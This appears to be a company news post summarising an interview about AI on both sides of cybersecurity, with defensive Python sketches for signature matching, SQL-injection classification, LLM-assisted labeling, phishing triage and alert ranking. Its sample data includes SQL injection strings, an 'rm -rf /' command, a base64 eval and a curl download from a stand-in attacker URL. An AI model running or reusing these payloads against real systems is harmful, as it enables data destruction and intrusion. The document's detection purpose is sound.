Right back at you: AI vs. AI in cybersecurity
Company News | March 11, 2025
The meteoric rise of AI is a double-edged sword: it unlocks unparalleled efficiency and futuristic innovation while exposing new vulnerabilities in privacy and cybersecurity. Amid these challenges, SecAI has emerged as a trailblazer in the fight against digital threats. In a recent exclusive interview with Tech In Asia, Chase Lee, managing director of SecAI, delves into how the organization harnesses artificial intelligence to combat evolving cyber threats.
Think about how many tech advancements are double-edged swords. Nuclear power is a zero-emissions energy source, but it is also used to create weapons of mass destruction. Meanwhile, the internet connects us globally, but it also lets misinformation spread faster than ever.
AI is no different.
The tech is often touted as a boon for productivity and data analytics, but malicious actors can make the most of these advantages too.
“AI is helping cybersecurity threats become faster and automated, more sophisticated, and giving them new attack vectors,” says Chase Lee, managing director of cybersecurity firm SecAI.
The good news? There’s nothing stopping the good guys from using AI to fight back.
An unfair matchup
In the cybersecurity space, defenders often play “an unfair game from the start,” says Lee. Attackers don’t follow any rules and can try whatever they want.
With AI, threat actors have gotten even more efficient at building tools and weapons for attacks.
For instance, antivirus software typically works by recognizing known malicious programs and preventing them from being installed on your system. However, attackers can use AI tools to automatically tweak viruses and generate scores of variants, making them harder to detect.
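To make that cat-and-mouse dynamic concrete, here is a minimal sketch of classic signature-based detection in Python; the hash database is a placeholder, not any vendor's real data. Because the lookup is an exact match, a single AI-tweaked byte in a variant produces a new hash and slips past the check.

```python
import hashlib
from pathlib import Path

# Placeholder database of known-bad SHA-256 signatures.
# A real antivirus database holds millions of entries.
KNOWN_BAD_HASHES = {
    "c0ffee0000000000000000000000000000000000000000000000000000000000",
}

def sha256_of(path: Path) -> str:
    """Hash a file's raw bytes."""
    return hashlib.sha256(path.read_bytes()).hexdigest()

def is_known_malware(path: Path) -> bool:
    # Exact-match lookup: a single changed byte in an AI-generated
    # variant yields a different hash, so this check misses it.
    return sha256_of(path) in KNOWN_BAD_HASHES
```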
Generative AI, in particular, has become a popular tool for attackers. Large language models (LLMs), the technology underlying generative AI, can be used to craft more believable phishing attacks. Just last year, an employee at a multinational firm was tricked into transferring US$25 million to fraudsters who used deepfakes of the company's chief financial officer on an online video call.
“AI has made these types of attacks much more effective, and it’s something we haven’t really faced before,” says Lee.
Wielding AI for good
Not all is lost for cybersecurity defenders.
According to Lee, attackers often rely on what's known as an SQL injection, a technique that slips malicious code into a target's system through unsanitized input. Defenders can counter this by using AI to automatically detect the attackers' code and block the injection.
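As a rough illustration of what such a detector could look like (a toy sketch, not SecAI's actual model), a character n-gram classifier can learn the tell-tale fragments of injected SQL; the handful of training examples below are invented for demonstration.

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

# Invented toy examples; a production system trains on millions.
queries = [
    "SELECT name FROM users WHERE id = 42",            # benign
    "SELECT * FROM orders WHERE date > '2024-01-01'",  # benign
    "' OR '1'='1' --",                                 # injection
    "1; DROP TABLE users; --",                         # injection
    "admin' UNION SELECT password FROM users --",      # injection
    "UPDATE items SET stock = 5 WHERE sku = 'A1'",     # benign
]
labels = [0, 0, 1, 1, 1, 0]  # 1 = malicious

# Character n-grams catch fragments like "' OR '" and "--" that
# keyword lists often miss when attackers vary their payloads.
model = make_pipeline(
    TfidfVectorizer(analyzer="char_wb", ngram_range=(2, 4)),
    LogisticRegression(),
)
model.fit(queries, labels)

print(model.predict(["' OR 'a'='a' --"]))  # expected: [1]
```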
To train the AI's detection capabilities, cybersecurity companies need to collect up to a few million data points and label them to separate safe code from malicious code. Doing this manually takes enormous effort, but the proliferation of LLMs has made the job considerably easier.
“Many LLMs are already trained with huge volumes of data,” says Lee. “All you need to do is give some examples – perhaps five lines of code – and tell it which parts are malicious. Then it can do the labeling for you.”
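Here is a hedged sketch of that few-shot labeling workflow, using the OpenAI chat API as one possible backend; the model name, seed examples, and prompt wording are assumptions for illustration, not a description of SecAI's pipeline.

```python
from openai import OpenAI  # pip install openai

client = OpenAI()  # assumes OPENAI_API_KEY is set in the environment

# Five hand-labeled seed examples, per Lee's "perhaps five lines of code".
FEW_SHOT = """\
Label each code line as SAFE or MALICIOUS.

cursor.execute("SELECT * FROM users WHERE id = %s", (uid,)) -> SAFE
os.system("rm -rf / --no-preserve-root") -> MALICIOUS
eval(base64.b64decode(payload)) -> MALICIOUS
logging.info("request served in %sms", dt) -> SAFE
subprocess.run(["curl", attacker_url, "-o", "/tmp/x"]) -> MALICIOUS
"""

def label(line: str) -> str:
    """Ask the LLM to extend the labeled examples to a new line."""
    resp = client.chat.completions.create(
        model="gpt-4o-mini",  # assumed model choice
        messages=[{"role": "user", "content": f"{FEW_SHOT}\n{line} ->"}],
    )
    return resp.choices[0].message.content.strip()

print(label("pickle.loads(request.data)"))
```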
However, he says that while safe code is often easy to obtain, examples of malicious code are harder to find, given the shrouded nature of attackers’ operations.
SecAI solved this by building its own versions of the tools hackers might use and employing them to generate synthetic data. Bolstered by robust intelligence-gathering capabilities, the firm has amassed over a billion malware samples and millions of data points on system vulnerabilities, and it has built a threat graph with hundreds of billions of nodes, each representing a potential attacking entity.
At the same time, SecAI’s researchers regularly track and analyze attack incidents to generate technical reports. Previously, these reports were mainly used as references during attack investigations, Lee says.
“However, as the LLMs we develop and fine-tune got adopted for cybersecurity, we found that these incident reports are particularly suitable for training AI models, as they help the algorithms understand actual attack techniques and thought processes,” he adds. “This significantly enhances their ability to continuously identify and analyze new attacks.”
In cybersecurity, keeping up with the latest threats is also important because of edge cases: instances where the existing model lacks the training to detect or prevent an attack. For example, an attacker might use a completely new method to pack and hide their malicious code when attempting to hack into a system.
“Once we have enough data on each edge case, we have to retrain a separate model to detect that attack method – it’s a continuous job,” Lee points out.
A versatile weapon
Besides detecting malicious code injections, defenders can also use AI to guard against phishing attacks.
For instance, while an attacker can use an LLM to generate a more believable email, the link they’re using is still inherently unsafe.
AI models can extract the URLs in an email, visit each site in a safe manner, and scan the HTML code to determine whether the website is legitimate.
“We can also screenshot the web page and use AI vision models to determine whether it’s the actual site or some kind of fake page,” Lee says.
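A minimal sketch of that kind of URL triage might look like the following; the heuristics and markers are invented for illustration, and a production scanner would run inside an isolated sandbox and pair this with the screenshot-plus-vision check Lee mentions.

```python
import requests
from urllib.parse import urlparse

# Invented markers for pages that solicit credentials.
SUSPICIOUS_MARKERS = ["password", "verify your account", "login", "ssn"]

def triage_url(url: str) -> dict:
    """Fetch a page cautiously and flag crude phishing signals."""
    resp = requests.get(
        url,
        timeout=5,
        allow_redirects=True,
        headers={"User-Agent": "scanner/0.1"},  # hypothetical scanner UA
    )
    html = resp.text.lower()
    hits = [m for m in SUSPICIOUS_MARKERS if m in html]
    requested_host = urlparse(url).netloc
    final_host = urlparse(resp.url).netloc
    return {
        "requested": requested_host,
        "landed_on": final_host,  # redirects to an odd host are a red flag
        "credential_bait": hits,  # password prompts on unknown domains
        "suspicious": bool(hits) and final_host != requested_host,
    }

# A vision-model pass over a screenshot, as Lee describes, would be the
# next step for pages that clone a known brand's look and feel.
```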
AI is also helpful for cybersecurity companies' internal operations. Teams often use a large number of tools, and each generates its own alerts on potential threats. These alerts can sometimes number in the tens of thousands daily.
“AI can act as an advanced recommendation system for alert prioritization, enabling teams to conduct more thorough analyses and generate reports with greater efficiency,” Lee explains.
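One way to picture such a prioritization layer is a simple scoring-and-ranking pass over incoming alerts; the fields and weights below are invented for illustration, and a real system would learn them from analyst feedback rather than hard-code them.

```python
from dataclasses import dataclass

@dataclass
class Alert:
    source: str       # which tool raised the alert
    severity: int     # 1 (info) to 5 (critical), as reported by the tool
    asset_value: int  # 1 to 5, importance of the affected system
    novelty: float    # 0 to 1, how unlike previously seen alerts this is

def priority(a: Alert) -> float:
    # Invented weights; novelty is boosted so unfamiliar patterns surface.
    return 0.5 * a.severity + 0.3 * a.asset_value + 2.0 * a.novelty

alerts = [
    Alert("EDR", severity=3, asset_value=5, novelty=0.1),
    Alert("IDS", severity=2, asset_value=2, novelty=0.9),
    Alert("WAF", severity=5, asset_value=4, novelty=0.2),
]

# Analysts work the queue top-down instead of drowning in raw alerts.
for a in sorted(alerts, key=priority, reverse=True):
    print(f"{priority(a):.2f}  {a.source}")
```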
Automation is the future
The AI cybersecurity arms race is set to escalate.
AI agents, for one, could soon take attackers’ hacks to the next level. Previously, AI models could automate individual parts of an attack, but the people behind them would still have to manually trigger subsequent steps.
AI agents would be able to think, plan, and evaluate how to launch entire operations on their own. This means they could potentially chain steps automatically, such as doing reconnaissance, probing for weaknesses, and then launching the actual attack, all without human intervention.
Thankfully, cybersecurity professionals can have AI agents on their team, too. These systems could eventually detect threats, investigate, and then execute mitigating measures autonomously with high accuracy and speed.
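Purely as a hypothetical sketch, a defensive agent loop might chain those three stages like this; every function, field, and threshold here is a stand-in for illustration, not a description of SecAI's system.

```python
def detect(events):
    """Stand-in detector: keep events an upstream model scored as risky."""
    return [e for e in events if e["risk"] > 0.8]

def investigate(incident):
    """Stand-in enrichment: attach context such as threat intel and history."""
    return {**incident, "verdict": "credential-stuffing", "confidence": 0.93}

def mitigate(finding):
    """Stand-in response: act autonomously only above a confidence bar."""
    if finding["confidence"] > 0.9:
        print(f"blocking source {finding['src']} ({finding['verdict']})")
    else:
        print(f"escalating {finding['src']} to a human analyst")

events = [
    {"src": "203.0.113.7", "risk": 0.95},
    {"src": "198.51.100.2", "risk": 0.30},
]
for incident in detect(events):
    mitigate(investigate(incident))
```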
Lee shares that this is something that SecAI is working toward, studying how AI agents can capitalize on threat intelligence and specialized tools to act as “independent cybersecurity enforcers” in the fight against cybercrime.
“Automation will be a key feature for both sides in the next few years, and I believe the growth of AI agents will be something to look out for in 2025,” he says.